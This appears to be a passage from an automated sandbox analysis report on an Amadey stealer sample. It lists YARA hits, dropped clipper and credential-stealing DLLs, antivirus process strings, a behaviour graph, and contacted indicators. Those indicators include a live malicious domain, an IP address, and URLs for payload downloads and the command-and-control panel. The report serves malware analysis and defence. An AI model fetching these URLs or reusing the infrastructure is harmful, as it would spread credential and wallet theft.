Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 4_2_0040B385
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0040B2B0 GetUserNameA, 4_2_0040B2B0
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004457B7 _free,_free,_free,GetTimeZoneInformation,_free, 4_2_004457B7
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 4_2_00408180
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: Process Memory Space: Dctooux.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys Clipper DLL
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 24.2.Dctooux.exe.48c0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.4910e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.Dctooux.exe.4930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.Dctooux.exe.4980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.48c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.48d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.Dctooux.exe.4930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.Dctooux.exe.4980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.4910e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.fud_new.exe.4940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.fud_new.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.fud_new.exe.4940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2290385798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2811339032.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2285765794.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2141512541.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3368787116.0000000004910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2285295236.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2289959026.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2241673718.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3363608752.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 4_2_00431261
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 4_2_00431F58
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_049014C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 4_2_049014C8
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_049021BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 4_2_049021BF
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048F14C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_048F14C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048F21BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_048F21BF
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 36_2_00402340
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 36_2_00431261
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 36_2_00431F58
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_049414C8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 36_2_049414C8
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_049421BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 36_2_049421BF
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427728 Sample: GhLMDfzXqQ.exe Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 48 topgamecheats.dev 2->48 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 11 other signatures 2->58 9 GhLMDfzXqQ.exe 17 2->9         started        signatures3 process4 dnsIp5 50 topgamecheats.dev 93.123.39.96, 49710, 49728, 49729 NET1-ASBG Bulgaria 9->50 42 C:\Users\user\AppData\Roaming\...\fud_new.exe, PE32 9->42 dropped 44 C:\Users\user\AppData\...\fud_new[1].exe, PE32 9->44 dropped 13 fud_new.exe 4 9->13         started        16 conhost.exe 9->16         started        file6 process7 file8 46 C:\Users\user\AppData\Local\...\Dctooux.exe, PE32 13->46 dropped 18 Dctooux.exe 13->18         started        21 Dctooux.exe 13->21         started        24 WerFault.exe 16 13->24         started        26 9 other processes 13->26 process9 file10 34 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 18->34 dropped 36 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 18->36 dropped 38 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 18->38 dropped 40 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 18->40 dropped 28 WerFault.exe 18->28         started        30 WerFault.exe 18->30         started        60 Multi AV Scanner detection for dropped file 21->60 62 Detected unpacking (changes PE section rights) 21->62 64 Detected unpacking (overwrites its own PE header) 21->64 32 WerFault.exe 21->32         started        signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
93.123.39.96
 topgamecheats.dev Bulgaria
43561 NET1-ASBG true

Contacted Domains

Name IP Active
topgamecheats.dev 93.123.39.96 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://topgamecheats.dev/8bjndDcoA3/index.php?wal=1 false unknown
http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1 false unknown
http://topgamecheats.dev/fud_new.exe false unknown
http://topgamecheats.dev/8bjndDcoA3/index.php false unknown
http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll false unknown
http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll false unknown
topgamecheats.dev/8bjndDcoA3/index.php true low